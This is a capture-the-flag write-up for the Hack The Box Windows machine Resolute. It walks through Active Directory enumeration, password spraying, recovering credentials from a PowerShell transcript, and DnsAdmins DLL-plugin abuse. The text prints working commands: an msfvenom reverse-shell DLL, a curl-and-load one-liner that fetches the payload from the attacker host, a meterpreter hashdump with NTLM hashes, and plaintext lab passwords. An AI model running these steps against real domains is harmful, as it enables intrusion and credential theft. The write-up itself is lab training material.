HTB - Resolute

Machine Info

Resolute is a medium difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM.

Enumeration

---

Scope

IP Address: 10.10.10.169

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE      REASON
53/tcp  open  domain       syn-ack
135/tcp open  msrpc        syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack
5985/tcp open   wsman      syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-11 02:24:26Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-11T02:24:32
|_  start_date: 2024-07-11T02:18:59
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h27m07s, deviation: 4h02m31s, median: 7m06s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2024-07-10T19:24:30-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

* Open ports: 53,88,135,139,389,445,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - KERBEROS - LDAP - RPC - SMB - winRM
* Versions: Windows Server 2016 Standard 14393
* Important Notes: Domain: megabank.local -  - FQDN: Resolute.megabank.local

DNS Enumeration

Zone transfer failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ dig axfr MEGABANK.LOCAL @$ip                    

; <<>> DiG 9.19.19-1-Debian <<>> axfr MEGABANK.LOCAL @10.10.10.169
;; global options: +cmd
; Transfer failed.

RPC Enumeration

I got a username list from rpcclient and filtered them.

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1  | tee -a users.lst

<snip>
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
<snip>

SMB Enumeration

I didn't get anything as anonymous login failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ smbclient -N -L //$ip                       
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                      
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\: 
SMB         10.10.10.169    445    RESOLUTE         [-] Error enumerating shares: STATUS_ACCESS_DENIED

I also try password spraying with the same usernames as passwords but failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u users.lst -p users.lst --no-bruteforce --continue-on-success

<snip>
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:sunita STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:abigail STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:marcus STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:sally STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:fred STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:angela STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:felicia <snip>

KERBEROS Enumeration

I tried ASREP-Roasting attack but no thing

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

<snip>
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>

Initial Access

---

When I run out all the options I know to get a foothold, I decided to query the users info I got from rpccclient, maybe a password exists in description field or something

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ for rid in $(cat rid.lst); do rpcclient -U "%" $ip -c "queryuser $rid" | tee -a rpc.output;done

<snip>
        User Name   :   marko
        Full Name   :   Marko Novak
        Home Drive  :   
        Dir Drive   :   
        Profile Path:   
        Logon Script:   
        Description :   Account created. Password set to Welcome123!
        Workstations:   
        Comment     :   
        Remote Dial :
<snip>

we found the password Welcome123!, Let's confirm access with user marko

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u marko -p 'Welcome123!'
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE

It seems like this password doesn't belong to him, So I will spray it to the list of users we have

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u users.lst -p 'Welcome123!' --continue-on-success
<sinp> 

SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE 
<snip>

So, we have now valid credentials melanie:Welcome123!, Let's see if we have remote access to that box

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec winrm $ip -u melanie -p 'Welcome123!'                    

WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)

Yes, we have :)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ evil-winrm -i $ip -u melanie -p 'Welcome123!'

*Evil-WinRM* PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
f65ae23b0313053bb9xxxxxxxxxxxxxxxx

User Flag: f65ae23b0313053bb9xxxxxxxxxxxxxxxx

---

Privilege Escalation

When I landed on windows box joined to Active Directory, I run bloodhound.py to collect info about the domain and provide it to bloodhound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound-python -u 'melanie' -p 'Welcome123!' -ns $ip -d megabank.local -c all

INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 28 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 20S

Start neo4j database and then run bloodhound to open GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ sudo neo4j start 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound 

provide the data collected as zip file to bloodhound

user ryan has a profile on the box, Let's enumerate him in bloodhound

*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan

Click on unrolled group membership to see nested group membership

• ryan is a member of DNSADMINS group via nested group membership, So If I could takeover this account, the path to Domain Admins is clear

I found no database, PowerShell history file, no stored credentials or scripts located somewhere however, I learned a trick before that I always make on windows machine which is looking for hidden files as I do in Linux

*Evil-WinRM* PS C:\> ls -Force

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        7/10/2024   7:18 PM      402653184 pagefile.sys

PSTranscripts is not a standard directory, Let's explore it

*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\

    Directory: C:\PSTranscripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203

*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\20191203

    Directory: C:\PSTranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

That .txt file looks very interesting, Let's see

*Evil-WinRM* PS C:\> type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

<snip>
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
<snip>

Let's check if these credential are valid

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec winrm $ip -u ryan -p 'Serv3r4Admin4cc123!'

WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)

And successfully got the ryan account.

• we can then abuse our membership in DNS Admins group, we can alter the .dll of dns service running as SYSTEM to add ourselves in Domain Admins group or get a reverse shell as SYSTEM

Before we start the attack, Let's first confirm we have control on dns service

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe sdshow DNS

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)

The object SID that has control of dns service is S-1-5-21-1392959593-3013219662-3596683436-1105 I look at bloodhound to get the SID of user ryan and see if the two SIDs match each other

So, we have control of DNS service, Let's start the attack.

Generate malicious dll to add ryan to domain admins

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=8443 -f dll -o shell.dll 

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll

upload the malicious dll to the box via winrm

*Evil-WinRM* PS C:\Users\ryan\Documents> upload shell.dll

Info: Upload successful!

Load our dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\shell.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Start meterpreter listener

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfconsole -q

msf6 > use exploit/multi/handler                                            
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0                                        
msf6 exploit(multi/handler) > set lport 8443                       
msf6 exploit(multi/handler) > run                                                                                                      
[*] Started reverse TCP handler on 0.0.0.0:8443 

Stop and start dns service to get the dll executed

sc.exe stop dns
sc.exe start dns

My exploit failed for some reason but after few moments, I realized that there was a script that revert everything and delete my payload, So I created a one-linear command to get my payload executed before it was deleted

*Evil-WinRM* PS C:\Users\ryan\Documents> curl 10.10.16.3/shell.dll -o shell.dll; dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\shell.dll; sc.exe stop dns; sc.exe start dns

msf6 exploit(multi/handler) > run 

[*] Started reverse TCP handler on 0.0.0.0:8443 
[*] Sending stage (201798 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.16.3:8443 -> 10.10.10.169:53631) at 2024-07-10 23:40:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8axxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49a9276d51927d3cd34a8ac69ae39c40:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ryan:1105:aad3b435b51404eeaad3b435b51404ee:3f653cb103e005246bc95ceb2f56e30b:::
marko:1111:aad3b435b51404eeaad3b435b51404ee:8276510304cefe6e77c3a9e910ba3a6a:::
sunita:6601:aad3b435b51404eeaad3b435b51404ee:4e67de165ebd5e604d6580b15cfc61b2:::
abigail:6602:aad3b435b51404eeaad3b435b51404ee:3f67ccb851b02ac4ee9f91eeddf1cac7:::
<snip>

meterpreter > shell
Process 2592 created.
Channel 1 created.

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Users\Administrator

C:\Users\Administrator>type Desktop\root.txt
2ef8121d16eb0fabebxxxxxxxxxxxxxxxx

Root Flag: 2ef8121d16eb0fabebxxxxxxxxxxxxxxxx

---

Reverst.ps1

• This the script which was preventing us as it does the following:

  • Reset ryan, melanie and administrator password

  • Reset dns settings

We can see the plaintext password of administrator

PS C:\Users\Administrator> type Documents\revert.ps1
type Documents\revert.ps1

$users = Get-Content C:\Users\Administrator\Documents\users.txt

Stop-Process -Name "dns" -Force
Stop-Service -Name "dns" -Force
reg delete HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters /v ServerLevelPluginDll /f
Start-Service -Name "dns"

$groups = Get-ADPrincipalGroupMembership -Identity ryan | where {$_.Name -ne "Contractors"}
Remove-ADPrincipalGroupMembership -Identity ryan -MemberOf $groups -Confirm:$false
Set-ADAccountPassword -Identity ryan -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Serv3r4Admin4cc123!" -Force)

$groups = Get-ADPrincipalGroupMembership -Identity melanie | where {$_.Name -ne "Remote Management Users"}
Remove-ADPrincipalGroupMembership -Identity melanie -MemberOf $groups -Confirm:$false
Set-ADAccountPassword -Identity melanie -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Welcome123!" -Force)

Set-ADAccountPassword -Identity administrator -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "DontH4ckxxxxxxxx" -Force)

Access the machine as admin with plaintext password.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ evil-winrm -i $ip -u administrator -p 'DontH4ckxxxxxxxxxxx'   

*Evil-WinRM* PS C:\Users\Administrator\Documents>